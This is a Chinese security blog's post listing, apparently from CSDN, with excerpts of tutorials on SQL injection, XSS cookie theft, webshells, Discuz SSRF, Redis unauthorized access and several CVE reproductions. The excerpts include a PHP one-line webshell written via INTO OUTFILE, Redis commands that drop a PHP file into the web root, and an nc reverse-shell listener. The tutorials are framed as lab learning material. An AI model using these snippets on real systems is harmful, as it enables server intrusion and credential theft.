自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(15)
  • 收藏
  • 关注

原创 Sql注入+代码执行getshell

QQ交流群:811401950一. 利用手段l 前台sql注入l 后台php代码执行二. 环境l Kali linux 若干工具l 本地靶机三. 步骤由于是本地搭建的靶机,先找一下ip地址,netdiscover一下,排除本机kali地址,那么135应该就是靶机地址了。Namp扫描一下开放的端口与服务开了80口,先访问试试(靶机名称叫DC-8,vuln上的),页...

2019-12-13 13:13:40 446 1

原创 ## linux sudo root 权限绕过漏洞(CVE-2019-14287)复现

web渗透学习交流群:811401950一.漏洞描述2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复。此漏洞编号是CVE-2019-14287,当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字,可以通过指定用户ID -1或4294967295以root用户身份运行命令。具有足够sudo权...

2019-12-07 17:04:39 241

原创 【安卓逆向】360壳过反调试+dump dex文件以及简单修复

交流学习Q群:984791973320 0 0mmap函数下段,然后F9运行断下,然后F8往下,一直运行到这里:F7进来,在R2寄存器这里打一个断点:F9运行到这里,然后F7进来;F8往下走,这里有比较指令:这个函数的返回值在R0里面存储,(可以直接把光标放在cmp那条指令然后F4跳过去 )把R0置零:置零之后呢,F9:再一次F8:继续在mmap函数末尾断下,然后继...

2020-04-14 15:20:10 861

原创 关于SRC漏洞挖掘的经验

交流Q群:876554035前言国家在注重安全行业,越来越多的SRC(安全响应中心)成立。在各大平台,比如漏洞盒子,补天,360众测等等都纷纷成立了安全响应中心,许多的企业在上面入驻,给白帽子们提供了一个很好的平台,避免了黑客利用漏洞而造成损失。一. 资产收集在挖掘SRC中,我们首先要做的就是确认资产。通常情况下,企业SRC会在项目里给出域名或者域名的范围。我们可以利用一些工具来收集子域名...

2020-02-19 11:14:45 4869 2

原创 【WEB攻防】图片木马的利用

交流Q群:876554035一,图片木马原理图片木马以文件上传漏洞为基本条件,将可执行的脚本写入到图片中去,再利用文件包含漏洞来执行图片中的一句话木马,从而获取目标服务器权限。二.工具及环境DVWA靶场环境010Editor中国菜刀三.具体步骤1.登陆DVWA靶场,调整安全级别为high,进入到File Upload页面。图一 登陆界面图二 选择安全级别,进入2.利用01...

2020-02-15 11:51:22 10312 7

原创 某waf实战SQL注入绕过fuzz过程

QQ交流群:876554035#01 环境简介服务器:windows2008 R2软件:phpstudy20180211php 5.4.45mysql 5.5.53某锁win_3.1.18.13服务端版本#02 Fuzz过程以基于union注入为例fuzz order by过程如下:?id=1’ order --+ 不拦截?id=1’ order by --+ 拦截n...

2020-02-11 11:18:51 627

原创 【Web攻防】XSS Cookie劫持实例

QQ交流群:811401950一. XSS cookie劫持原理Cookie中一般加密保存了当前用户的登陆凭证。Cookie如果丢失,往往意味着用户的登陆凭证丢失。换句话说,攻击者可以不通过密码,而直接登陆进用户账户。二.工具及环境① DVWA靶场环境② Hackbar火狐组件③ Windows7 虚拟机(存放收集cookie信息的php脚本文件)三.具体步骤登陆DVWA靶场,...

2020-02-05 11:00:31 1201

原创 SQLMAP获取后台账号密码

QQ交流学习群:811401950一. SQLmapSQLMap是一个自动化注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件。支持的数据库Mysql、Oracle、SQL Server等众多数据库。二. 常见注入类型ü 布尔类型盲注,即可以根据返回页面判断条件真假的注入ü 基于时间的盲注,即不能根据返回页面的内容判断任何信息,要用条件语句查看时间的延...

2020-01-16 12:08:30 5536 2

原创 PHP大马后门分析

QQ交流群:811401950一. PHP大马PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过后门获得服务器的权限。今天就来分析一波该大马中的后门。二. 分析大马文件打开下载的php大马,可以看出该大马是...

2020-01-08 11:20:10 2997 1

原创 phpmyadmin通过日志写入一句话木马

QQ交流群:8765540351.想通过into outfile写入一句话木马select ‘<?php assert($_POST[“cmd”];?)>’ into outfile ‘D:/phpstudy/PHPTutorial/WWW/xx.php’;需要知道绝对路径2.执行下来,报错 “MySQL服务器正在使用–secure-file-priv选项运行,因此它无法执行此...

2019-12-26 11:39:41 4255

原创 Discuz-3.1 ssrf漏洞利用操作

QQ交流群:876554035#001 环境搭建:List itemPhpstudy+win7搭建discuz漏洞环境把Discuz-3.1 源码拖到网站根目录,然后访问upload目录进行安装,根据提示即可安装完成访问一波:#002 漏洞复现:Centos7,临时关闭防火墙开启nc监听6666端口:nc -lvp 6666查看centos7的ip利用discuz的漏...

2019-12-21 11:37:30 1278 1

原创 基于locate函数的的时间盲注

QQ交流群:8765540351.在盲注中,字符串截取函数我们一般使用substr或者substring(两者一样),但是还有一个冷门函数locate函数可以截取实现盲注。2.那么我们先来了解这个函数的用法,locate(substr,str,pos) 返回子串 substr 在字符串 str 中的第 pos 位置后第一次出现的位置。如果 substr 不在 str 中返回 0。看下图。...

2019-12-18 15:32:43 218

原创 Discuz-ssrf利用计划任务反弹shell

QQ交流群:811401950#001 环境搭建:Centos7(安装有apache,php,mysql,redis)利用winscp把discuz的源码拖到var/www/html目录下:chmod -R 777 upload/ 改一下权限然后访问192.168.136.133/upload进行安装,但是访问的时候愣是给我提示目录不存在,并且相关文件不可写但是查看...

2019-12-17 11:14:18 282

原创 Apache Solr远程代码执行漏洞 (CVE-2019-0193)复现操作

QQ交流学习群:811401950一. 漏洞描述2019年11月16日,Apache官方发布Apache Solr远程代码执行漏洞(CVE-2019-0193)安全通告,此漏洞存在于可选模块DataImportHandler 中,DataImportHandler是用于从数据库或其他源提取数据的常用模块,该模块中所有DIH配置都可以通过外部请求的dataConfig参 数来设置,由于DIH配置...

2019-12-11 13:38:46 626

原创 Redis未授权访问漏洞的利用

web渗透学习交流群:811401950利用redis写webshell在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save然后看一下目录下是否生成了一个redis.php的文件可以看到...

2019-12-09 20:34:19 176

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除